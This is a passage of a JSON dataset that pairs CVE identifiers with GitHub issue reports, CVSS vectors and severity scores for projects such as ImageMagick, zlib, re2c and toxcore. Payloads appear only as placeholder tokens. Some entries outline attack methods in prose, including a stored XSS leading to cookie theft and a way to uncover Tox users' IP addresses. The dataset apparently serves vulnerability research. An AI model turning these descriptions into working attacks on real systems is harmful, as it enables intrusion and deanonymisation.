  30990. "baseScore": 8.8,
  30991. "impactScore": 5.9,
  30992. "exploitabilityScore": 2.8
  30993. },
  30994. {
  30995. "CVE_ID": "CVE-2018-21232",
  30996. "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/219",
  30997. "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/219",
  30998. "Repo_new": "skvadrik/re2c",
  30999. "Issue_Created_At": "2018-09-05T07:12:10Z",
  31000. "description": "overflow NUMBERTAG re test fails on system with small stack. Factoring out the issue of URLTAG On small stack systems ( APITAG ) APITAG test fails: ERRORTAG",
  31001. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31002. "severity": "MEDIUM",
  31003. "baseScore": 5.5,
  31004. "impactScore": 3.6,
  31005. "exploitabilityScore": 1.8
  31006. },
  31007. {
  31008. "CVE_ID": "CVE-2018-21234",
  31009. "Issue_Url_old": "https://github.com/oblac/jodd/issues/628",
  31010. "Issue_Url_new": "https://github.com/oblac/jodd/issues/628",
  31011. "Repo_new": "oblac/jodd",
  31012. "Issue_Created_At": "2018-08-17T13:37:15Z",
  31013. "description": "Potential vulnerability in JSON deserialization. Current behavior Jodd's Json parser supports polymorphic deserialization when APITAG is set. If an application parses JSON with this configuration from an untrusted source, it could lead to remote code execution. The problem is quite the same as in other Java JSON libraries. Here you can read more: URLTAG FILETAG Expected behavior At least, you should mention security implication of usage APITAG similar to Jackson databind URLTAG Steps to Reproduce the Problem If necessary, I could send an example of JSON which lead to RCE",
  31014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31015. "severity": "CRITICAL",
  31016. "baseScore": 9.8,
  31017. "impactScore": 5.9,
  31018. "exploitabilityScore": 3.9
  31019. },
  31020. {
  31021. "CVE_ID": "CVE-2018-21247",
  31022. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/253",
  31023. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/253",
  31024. "Repo_new": "libvnc/libvncserver",
  31025. "Issue_Created_At": "2018-09-11T15:29:14Z",
  31026. "description": "SECURITY: memory leak in libvncclient in APITAG function. APITAG URLTAG function leaks memory, because tmphost buffer is filled by using snprintf function, but after buffer is being sent back to client using APITAG , which sent the whole tmphost buffer including its uninitialized part, which would expose uninitialized memory of client application. Example file APITAG contains same kind of vulnerability as well. This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
  31027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31028. "severity": "HIGH",
  31029. "baseScore": 7.5,
  31030. "impactScore": 3.6,
  31031. "exploitabilityScore": 3.9
  31032. },
  31033. {
  31034. "CVE_ID": "CVE-2018-21269",
  31035. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/201",
  31036. "Issue_Url_new": "https://github.com/openrc/openrc/issues/201",
  31037. "Repo_new": "openrc/openrc",
  31038. "Issue_Created_At": "2018-01-24T14:40:26Z",
  31039. "description": "checkpath: symlinks are followed in non terminal path components. Let's use a separate issue for this so we don't conflate it with the race condition fix in URLTAG With the following service script, CODETAG I can replace APITAG (at my leisure) with a symlink to APITAG ... APITAG and the next time the service is restarted, checkpath will change ownership of APITAG : ERRORTAG Even if the service script checks the return value of checkpath , I have a moment to replace \"bar\" with a symlink. The systemd tmpfiles implementation has a similar issue URLTAG",
  31040. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  31041. "severity": "MEDIUM",
  31042. "baseScore": 5.5,
  31043. "impactScore": 3.6,
  31044. "exploitabilityScore": 1.8
  31045. },
  31046. {
  31047. "CVE_ID": "CVE-2018-21270",
  31048. "Issue_Url_old": "https://github.com/mhart/StringStream/issues/7",
  31049. "Issue_Url_new": "https://github.com/mhart/stringstream/issues/7",
  31050. "Repo_new": "mhart/stringstream",
  31051. "Issue_Created_At": "2018-05-14T23:16:57Z",
  31052. "description": "Uninitialized Memory Exposure. According to Snyk URLTAG , _stringstream_ has a vulnerability when run on FILETAG NUMBERTAG and below. The bug comes from this line : URLTAG More details can be found here : URLTAG Thank you for the package, by the way !",
  31053. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  31054. "severity": "MEDIUM",
  31055. "baseScore": 6.5,
  31056. "impactScore": 4.2,
  31057. "exploitabilityScore": 2.2
  31058. },
  31059. {
  31060. "CVE_ID": "CVE-2018-25008",
  31061. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/51780",
  31062. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/51780",
  31063. "Repo_new": "rust-lang/rust",
  31064. "Issue_Created_At": "2018-06-25T15:44:34Z",
  31065. "description": "Insuficient synchronization in APITAG . Consider the following Rust code: ERRORTAG The first thread acquires the lock, modifies the variable, and then drop its Arc without unlocking (that's the point of the APITAG ). The second thread waits until the first thread decrements the count by dropping its Arc, and then uses APITAG to access the content without taking the lock (at that time, the mutex is still locked). My claim is that there is a race between the two accesses of the content of the mutex. The only reason the two accesses would be in a happens before relationship would be that APITAG and APITAG would establish this happens before relationship. However, even though APITAG does use a release write, APITAG only uses a relaxed read of the strong counter (via ERRORTAG ). The fix is to use an acquire read in ERRORTAG . I do not expect significant performance penalty here, since ERRORTAG already contains several release acquire accesses (of the weak count). CC APITAG",
  31066. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  31067. "severity": "MEDIUM",
  31068. "baseScore": 5.9,
  31069. "impactScore": 3.6,
  31070. "exploitabilityScore": 2.2
  31071. },
  31072. {
  31073. "CVE_ID": "CVE-2018-25021",
  31074. "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/1214",
  31075. "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/1214",
  31076. "Repo_new": "toktok/c-toxcore",
  31077. "Issue_Created_At": "2018-09-28T08:19:22Z",
  31078. "description": "Massive red shutdown of nodes.",
  31079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31080. "severity": "HIGH",
  31081. "baseScore": 7.5,
  31082. "impactScore": 3.6,
  31083. "exploitabilityScore": 3.9
  31084. },
  31085. {
  31086. "CVE_ID": "CVE-2018-25022",
  31087. "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/873",
  31088. "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/873",
  31089. "Repo_new": "toktok/c-toxcore",
  31090. "Issue_Created_At": "2018-04-15T06:46:40Z",
  31091. "description": "Onion vulnerability. Currently onion module allows to send any byte sequence through onion path. It can lead to possibility to bypass onion and get IP address (and friend list eventually) knowing only long term public key. Let's say Alice announces itself to Bob through onion path. After announcement Bob knows Alice's long term public key and onion return addresses to send packets back to Alice. But Bob doesn't know IP address of Alice and want to find it out. All he needs to do is send NAT ping request with his own DHT public key to Alice through onion path using onion return addresses he knows. If Bob is lucky enough to have close DHT public key to Alice's key Alice will redirect this ping request directly to Bob. After receiving his own request Bob will know IP address of Alice. Now, if somewone want to know somebody's IP address he can generate close enough long term public key, run many DHT nodes and send pings to them one by one. So I suggest to restrict packet kinds that can be sent through onion path: URLTAG I also monitored tox network through several DHT nodes and didn't notice anything other than onion announce/data packets. So this change shouldn't break anything.",
  31092. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  31093. "severity": "LOW",
  31094. "baseScore": 3.1,
  31095. "impactScore": 1.4,
  31096. "exploitabilityScore": 1.6
  31097. },
  31098. {
  31099. "CVE_ID": "CVE-2018-25031",
  31100. "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/4872",
  31101. "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/4872",
  31102. "Repo_new": "swagger-api/swagger-ui",
  31103. "Issue_Created_At": "2018-09-13T03:02:46Z",
  31104. "description": "add an APITAG option. Content & configuration Swagger UI configuration options: APITAG Is your feature request related to a problem? APITAG We\u2019ve observed that the ?url= parameter in APITAG allows an attacker to override an otherwise hard coded schema file. This opens the door to issues such as URLTAG and URLTAG which would otherwise be prevented by hard coding the schema file URL. The behavior appears to be a regression in the NUMBERTAG releases. It can easily be reproduced by passing in a URL to the APITAG constructor and then using the ?url parameter to override it, while observing the behavior in the Net panel of your browser\u2019s developer tools. Note that CORS rules can prevent a test from succeeding, but do not prevent a real attack. const ui = APITAG ... url: 'some hard coded APITAG }); Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker\u2019s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I\u2019d recommend disabling it by default and cautioning users against enabling it. Describe the solution you'd like APITAG for NUMBERTAG Add an APITAG or similar option. ~If omitted,~ default to false ~if a URL is passed into the constructor, otherwise default true.~ for NUMBERTAG Change the default ~when omitted~ to false. Describe alternatives you've considered APITAG Our workaround was to detect the URL parameter before initializing APITAG and failing early if it was set. Additional context This is taken from a security report given to the Swagger team by Ken Winters, based on investigation done by Gaurav Shet and Ben Zulanch all over at APITAG The decision was made to put this in the public issue tracker because (a) we aren't going to immediately fix this, and (b) the attack surface for this is significantly diminished by our effective sanitization efforts to deter XSS attacks in documents used as input.",
  31105. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
  31106. "severity": "MEDIUM",
  31107. "baseScore": 4.3,
  31108. "impactScore": 1.4,
  31109. "exploitabilityScore": 2.8
  31110. },
  31111. {
  31112. "CVE_ID": "CVE-2018-25032",
  31113. "Issue_Url_old": "https://github.com/madler/zlib/issues/605",
  31114. "Issue_Url_new": "https://github.com/madler/zlib/issues/605",
  31115. "Repo_new": "madler/zlib",
  31116. "Issue_Created_At": "2022-03-26T19:07:23Z",
  31117. "description": "CVETAG (zlib memory corruption on deflate). CVETAG tracks a bug in zlib NUMBERTAG which allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. There is a fix from MENTIONTAG at URLTAG MENTIONTAG reports at URLTAG that this patch never made it into a release, and at the time of writing no distros had picked it up as a fix.",
  31118. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31119. "severity": "HIGH",
  31120. "baseScore": 7.5,
  31121. "impactScore": 3.6,
  31122. "exploitabilityScore": 3.9
  31123. },
  31124. {
  31125. "CVE_ID": "CVE-2018-25033",
  31126. "Issue_Url_old": "https://github.com/admesh/admesh/issues/28",
  31127. "Issue_Url_new": "https://github.com/admesh/admesh/issues/28",
  31128. "Repo_new": "admesh/admesh",
  31129. "Issue_Created_At": "2018-09-12T00:16:49Z",
  31130. "description": "heap buffer flow in stl_update_connects_remove NUMBERTAG Find a heap buffer overflow with the input. Hope this report is helpful. FILETAG ERRORTAG",
  31131. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  31132. "severity": "HIGH",
  31133. "baseScore": 8.1,
  31134. "impactScore": 5.2,
  31135. "exploitabilityScore": 2.8
  31136. },
  31137. {
  31138. "CVE_ID": "CVE-2018-3717",
  31139. "Issue_Url_old": "https://github.com/JacksonTian/anywhere/issues/33",
  31140. "Issue_Url_new": "https://github.com/jacksontian/anywhere/issues/33",
  31141. "Repo_new": "jacksontian/anywhere",
  31142. "Issue_Created_At": "2018-02-14T20:46:12Z",
  31143. "description": "Security issue. Hi, I'm a member of the FILETAG Security WG and we received a report regarding a security issue with this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
  31144. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31145. "severity": "MEDIUM",
  31146. "baseScore": 5.4,
  31147. "impactScore": 2.7,
  31148. "exploitabilityScore": 2.3
  31149. },
  31150. {
  31151. "CVE_ID": "CVE-2018-3740",
  31152. "Issue_Url_old": "https://github.com/rgrove/sanitize/issues/176",
  31153. "Issue_Url_new": "https://github.com/rgrove/sanitize/issues/176",
  31154. "Repo_new": "rgrove/sanitize",
  31155. "Issue_Created_At": "2018-03-20T02:24:07Z",
  31156. "description": "Placeholder.",
  31157. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  31158. "severity": "HIGH",
  31159. "baseScore": 7.5,
  31160. "impactScore": 3.6,
  31161. "exploitabilityScore": 3.9
  31162. },
  31163. {
  31164. "CVE_ID": "CVE-2018-3744",
  31165. "Issue_Url_old": "https://github.com/danielcardoso/html-pages/issues/2",
  31166. "Issue_Url_new": "https://github.com/danielcardoso/html-pages/issues/2",
  31167. "Repo_new": "danielcardoso/html-pages",
  31168. "Issue_Created_At": "2018-01-30T15:18:16Z",
  31169. "description": "Security issue. Hello, The FILETAG ecosystem security team has received a report regarding this module. Previously, an email was sent to EMAILTAG , but no response was received. What is the best way to privately reach someone with commit rights to this repo? Feel free to reach out to me directly via the email address listed in my APITAG profile. Thanks!",
  31170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31171. "severity": "CRITICAL",
  31172. "baseScore": 9.8,
  31173. "impactScore": 5.9,
  31174. "exploitabilityScore": 3.9
  31175. },
  31176. {
  31177. "CVE_ID": "CVE-2018-3778",
  31178. "Issue_Url_old": "https://github.com/mcollina/aedes/issues/211",
  31179. "Issue_Url_new": "https://github.com/moscajs/aedes/issues/211",
  31180. "Repo_new": "moscajs/aedes",
  31181. "Issue_Created_At": "2018-08-06T17:08:09Z",
  31182. "description": "[SECURITY] Last will messages is not checked against authorization.. The LWT is not checked for authorization. Simple example: ERRORTAG Now, from a client, connect and subscribe to \"will\". From another client, connect with a last will message with topic \"will\". Then send a message to \"test\", breaking the connection (because of authorization failure). Breaking the connection will trigger the LWT, and thus sends a message to \"will\", which can be seen in the other client.",
  31183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  31184. "severity": "MEDIUM",
  31185. "baseScore": 5.3,
  31186. "impactScore": 1.4,
  31187. "exploitabilityScore": 3.9
  31188. },
  31189. {
  31190. "CVE_ID": "CVE-2018-4862",
  31191. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4134",
  31192. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4134",
  31193. "Repo_new": "octopusdeploy/issues",
  31194. "Issue_Created_At": "2018-01-03T02:02:42Z",
  31195. "description": "Potential Azure account scoping bypass. An authenticated user with APITAG permission could reference an Azure account in such a way as to bypass the scoping restrictions Relates to APITAG NUMBERTAG",
  31196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31197. "severity": "HIGH",
  31198. "baseScore": 8.8,
  31199. "impactScore": 5.9,
  31200. "exploitabilityScore": 2.8
  31201. },
  31202. {
  31203. "CVE_ID": "CVE-2018-4868",
  31204. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/202",
  31205. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/202",
  31206. "Repo_new": "exiv2/exiv2",
  31207. "Issue_Created_At": "2018-01-01T13:58:07Z",
  31208. "description": "APITAG error in sanitizer_posix.cc. version: exi NUMBERTAG a NUMBERTAG bit build) ./exi NUMBERTAG poc when memory not enough output this error found by afl ERRORTAG testcase: URLTAG",
  31209. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31210. "severity": "MEDIUM",
  31211. "baseScore": 5.5,
  31212. "impactScore": 3.6,
  31213. "exploitabilityScore": 1.8
  31214. },
  31215. {
  31216. "CVE_ID": "CVE-2018-5212",
  31217. "Issue_Url_old": "https://github.com/Arsenal21/simple-download-monitor/issues/27",
  31218. "Issue_Url_new": "https://github.com/arsenal21/simple-download-monitor/issues/27",
  31219. "Repo_new": "arsenal21/simple-download-monitor",
  31220. "Issue_Created_At": "2018-01-02T09:53:54Z",
  31221. "description": "Vulnerability Report: Stored XSS bug at the latest version of simple download monitor. Well ,sir ,I just found a Stored XSS bug here. When I login into the wordpress panel, assume I have a low privilege role like a contributor user. Because the admin user has turned on the option of the wp plugin simple download monitor, a normal user like me can also use it. Now I can write something in the function APITAG Download\": APITAG But when I fuzz the parameters in this plugin, I found when I write something into these points, it does not filter well: APITAG FILETAG FILETAG While it tell us to enter a valid URL of the file in the text box below, I can write something with evil content like: APITAG Then we can publish the post or just submit it to the admin user for an audit. FILETAG It won't be long beofore I get the other user's cookie or do something more evilly. FILETAG FILETAG Well, by the way, I just test the bug in the wordpress NUMBERTAG and the latest version of the wp plugin simple download monitor.",
  31222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31223. "severity": "MEDIUM",
  31224. "baseScore": 5.4,
  31225. "impactScore": 2.7,
  31226. "exploitabilityScore": 2.3
  31227. },
  31228. {
  31229. "CVE_ID": "CVE-2018-5246",
  31230. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/929",
  31231. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/929",
  31232. "Repo_new": "imagemagick/imagemagick",
  31233. "Issue_Created_At": "2018-01-04T01:33:05Z",
  31234. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage APITAG /dev/null montage: unrecognized image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG f6b7dd in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ba NUMBERTAG e in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG a6 in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31236. "severity": "MEDIUM",
  31237. "baseScore": 6.5,
  31238. "impactScore": 3.6,
  31239. "exploitabilityScore": 2.8
  31240. },
  31241. {
  31242. "CVE_ID": "CVE-2018-5247",
  31243. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/928",
  31244. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/928",
  31245. "Repo_new": "imagemagick/imagemagick",
  31246. "Issue_Created_At": "2018-01-04T01:30:39Z",
  31247. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc.rla /dev/null montage: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG cda5b in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5aaf1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5d2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG b1e NUMBERTAG f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31249. "severity": "MEDIUM",
  31250. "baseScore": 6.5,
  31251. "impactScore": 3.6,
  31252. "exploitabilityScore": 2.8
  31253. },
  31254. {
  31255. "CVE_ID": "CVE-2018-5248",
  31256. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/927",
  31257. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/927",
  31258. "Repo_new": "imagemagick/imagemagick",
  31259. "Issue_Created_At": "2018-01-04T01:25:57Z",
  31260. "description": "heap buffer overflow in sixel_decode. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib FILETAG ubuntu APITAG magick montage APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG fcb NUMBERTAG a NUMBERTAG bp NUMBERTAG ffde NUMBERTAG a2fd0 sp NUMBERTAG ffde NUMBERTAG a2fc8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fcb NUMBERTAG a NUMBERTAG in sixel_decode PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG b in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in sixel_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8ea0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  31261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31262. "severity": "HIGH",
  31263. "baseScore": 8.8,
  31264. "impactScore": 5.9,
  31265. "exploitabilityScore": 2.8
  31266. },
  31267. {
  31268. "CVE_ID": "CVE-2018-5251",
